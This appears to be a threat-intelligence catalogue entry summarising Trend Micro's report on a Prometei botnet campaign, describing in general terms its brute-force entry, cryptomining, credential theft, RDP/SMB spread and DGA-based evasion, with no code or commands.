Type
Campaign
Actors
Prometei operator
Pub. date
October 23, 2024
Initial access
1-day vulnerabilityPassword attack
Impact
Resource hijacking
Observed techniques
Password bruteforcingVulnerability exploitation
Observed tools
Prometei
References
https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html
Status
Finalized
Last edited
Nov 14, 2024 1:35 PM
The Prometei botnet attempted to infiltrate a company’s network using a brute-force attack. Researchers from Trend Micro identified and mitigated the threat by tracing Prometei’s stealthy, modular structure. Prometei, primarily aimed at cryptocurrency mining and credential theft, exploits vulnerabilities like RDP and SMB to spread quickly across networks, deploying PowerShell scripts to evade detection and persist across reboots.
The investigation revealed Prometei’s intricate evasion tactics, including a Domain Generation Algorithm (DGA) for dynamic C&C communication, encrypted payloads, and Base64-obfuscated PowerShell commands. Analysis points to Russian-speaking threat actors, as the malware avoids targeting Russian systems.